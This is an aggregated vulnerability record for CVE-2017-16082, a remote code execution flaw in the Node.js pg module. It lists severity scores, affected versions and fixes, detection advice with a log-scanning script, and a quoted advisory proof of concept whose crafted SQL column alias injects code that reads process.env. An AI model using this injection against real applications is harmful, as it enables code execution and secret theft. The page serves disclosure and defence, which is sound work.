CVE-2017-16082
Published: 2018-06-07
Priority: P261 · critical · 9.8 (CVSS 3.0)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EPSS: 10.51% (95.2th percentile)
A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are two scenarios in which an application is likely to be vulnerable: 1) executing unsafe, user-supplied SQL that contains a malicious column name; 2) connecting to an untrusted database and executing a query that returns results in which any of the column names are malicious.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | node-postgres | < node-postgres 7.7.1-1 (bookworm) | node-postgres 7.7.1-1 (bookworm) |
| hackerone | pg_node_module | < 2.11.2 \|\| >= 3.0.0 < 3.6.4 \|\| >= 4.0.0 < 4.5.7 \|\| >= 5.0.0 < 5.2.1 \|\| >= 6.0.0 < 6.0.5 \|\| >= 6.1.0 < 6.1.6 \|\| >= 6.2.0 < 6.2.5 \|\| >= 6.3.0 < 6.3.3 \|\| >= 6.4.0 < 6.4.2 \|\| >= 7.0.0 < 7.0.2 \|\| >= 7.1.0 < 7.1.2 | 2.11.2 \|\| >= 3.0.0 < 3.6.4 \|\| >= 4.0.0 < 4.5.7 \|\| >= 5.0.0 < 5.2.1 \|\| >= 6.0.0 < 6.0.5 \|\| >= 6.1.0 < 6.1.6 \|\| >= 6.2.0 < 6.2.5 \|\| >= 6.3.0 < 6.3.3 \|\| >= 6.4.0 < 6.4.2 \|\| >= 7.0.0 < 7.0.2 \|\| >= 7.1.0 < 7.1.2 |
| node-postgres | pg | < 5.2.1 | 5.2.1 |
| node-postgres | pg | >= 0 < 2.11.2 | 2.11.2 |
| node-postgres | pg | >= 2.0.0 < 2.11.2 | 2.11.2 |
| node-postgres | pg | >= 3.0.0 < 3.6.4 | 3.6.4 |
| node-postgres | pg | >= 3.0.0 < 3.6.4 | 3.6.4 |
| node-postgres | pg | >= 4.0.0 < 4.5.7 | 4.5.7 |
| node-postgres | pg | >= 4.0.0 < 4.5.7 | 4.5.7 |
| node-postgres | pg | >= 5.0.0 < 5.2.1 | 5.2.1 |
| node-postgres | pg | >= 6.0.0 < 6.4.2 | 6.4.2 |
| node-postgres | pg | >= 6.0.0 < 6.0.5 | 6.0.5 |
| node-postgres | pg | >= 6.1.0 < 6.1.6 | 6.1.6 |
| node-postgres | pg | >= 6.2.0 < 6.2.5 | 6.2.5 |
| node-postgres | pg | >= 6.3.0 < 6.3.3 | 6.3.3 |
| node-postgres | pg | >= 6.4.0 < 6.4.2 | 6.4.2 |
| node-postgres | pg | >= 7.0.0 < 7.1.2 | 7.1.2 |
| node-postgres | pg | >= 7.0.0 < 7.0.2 | 7.0.2 |
| node-postgres | pg | >= 7.1.0 < 7.1.2 | 7.1.2 |
Detection & IOCs (extracted from sources)
- Look for PostgreSQL query results or SQL statements containing specially crafted column names that could be interpreted as code by the pg Node.js module.
- Monitor for execution of user-supplied SQL containing untrusted or unusual column names passed through the pg module.
- Alert on pg module connections to untrusted/external databases where query results with unexpected column names are returned.
- The Debian node-postgres packages are fixed in version 7.7.1-1 (bookworm, bullseye, forky, sid, trixie). Ensure the pg npm/Node.js module is updated to a patched version.
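One way to implement the first two detection points, as an added example (not code from the advisory or the pg project): it pulls double-quoted identifiers out of logged SQL statements and reports any that fall outside an allow-list. The names `SAFE_NAME`, `quotedIdentifiers`, `suspiciousNames`, `scanLog` and the allow-list itself are assumptions made for this sketch.

```javascript
// Allow-list for ordinary column names (assumption: tune to your schema).
const SAFE_NAME = /^[A-Za-z_][A-Za-z0-9_$ .]*$/;

// Return the double-quoted identifiers in a SQL string. A doubled quote ("")
// inside an identifier is an escaped quote. Single-quoted string literals are
// walked the same way but discarded, so their contents are never reported.
// Simplification: SQL comments and E'...' backslash escapes are not parsed.
function quotedIdentifiers(sql) {
  const found = [];
  let i = 0;
  while (i < sql.length) {
    const q = sql[i];
    if (q !== '"' && q !== "'") { i += 1; continue; }
    let j = i + 1;
    let text = '';
    while (j < sql.length) {
      if (sql[j] === q) {
        if (sql[j + 1] !== q) break;   // closing quote
        text += q;                      // doubled quote: keep one, skip both
        j += 2;
      } else {
        text += sql[j];
        j += 1;
      }
    }
    if (q === '"') found.push(text);
    i = j + 1;
  }
  return found;
}

// Names that fall outside the allow-list (quotes, backslashes, newlines, ...).
const suspiciousNames = (names) => names.filter((n) => !SAFE_NAME.test(n));

// Scan logged statements; returns [{ line, names }] for statements with hits.
function scanLog(statements) {
  return statements
    .map((sql, idx) => ({ line: idx + 1, names: suspiciousNames(quotedIdentifiers(sql)) }))
    .filter((hit) => hit.names.length > 0);
}

// Constructed sample log; the third entry is the statement from the page's PoC.
const SAMPLE_LOG = [
  'SELECT id, email AS "user email" FROM accounts',
  "SELECT 'it''s \"quoted\" text' AS note",
  `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`,
];

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

For the untrusted-database scenario, the same `suspiciousNames` check can be run over `res.fields.map(f => f.name)` on a patched pg release to flag unexpected column names in results.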
CVSS provenance
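| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | | 9.8 | CRITICAL | |
| vendor_debian | | 9.8 | LOW | |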
Debian
CVE-2017-16082: node-postgres - A remote code execution vulnerability was found within the pg module when the re...
vendor_debian·2017·CVSS 9.8
Scope: local
bookworm: resolved (fixed in 7.7.1-1)
bullseye: resolved (fixed in 7.7.1-1)
forky: resolved (fixed in 7.7.1-1)
sid: resolved (fixed in 7.7.1-1)
trixie: resolved (fixed in 7.7.1-1)
GHSA
Remote Code Execution in pg
ghsa·2018-07-24
CVE-2017-16082 [CRITICAL] CWE-94 Remote Code Execution in pg
Affected versions of `pg` contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.
There are two specific scenarios in which it is likely for an application to be vulnerable:
1. The application executes unsafe, user-supplied SQL which contains malicious column names.
2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.
## Proof of Concept
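```
// Proof of concept from the advisory: the crafted part is the pair of column aliases.
const { Client } = require('pg')
const client = new Client()
client.connect()
// On affected pg versions, the expression embedded in the second alias
// (console.log(process.env)) runs in the Node.js process when the result is processed.
const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`
client.query(sql, (err, res) => {
  client.end()
})
```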
## Recommendation
* Version 2.x.x: Update to versio
OSV
Remote Code Execution in pg
osv·2018-07-24
OSV
CVE-2017-16082: A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name
osv·2018-06-07·CVSS 9.8
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
Published: 2018-06-07